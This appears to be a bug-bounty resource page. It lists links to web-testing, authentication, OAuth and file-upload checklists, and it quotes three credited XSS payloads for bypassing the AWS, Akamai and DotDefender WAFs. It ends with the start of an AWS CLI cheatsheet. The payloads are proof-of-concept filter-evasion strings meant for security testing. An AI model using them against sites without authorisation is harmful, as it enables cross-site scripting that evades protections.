lamscun

Bug Bounty Checklist and Cheatsheets

WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf

Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf

Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html

File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf

lamscun

@vanshitmalhotra | Bypass AWS WAF -// 
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>

@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc 
<img  sr%00c=x o%00nerror=((pro%00mpt(1)))>

DotDefender WAF bypass by @0xInfection 
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

lamscun

AWS CLI Cheatsheet

http://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html https://www.youtube.com/watch?v=_wiGpBQGCjU

Setup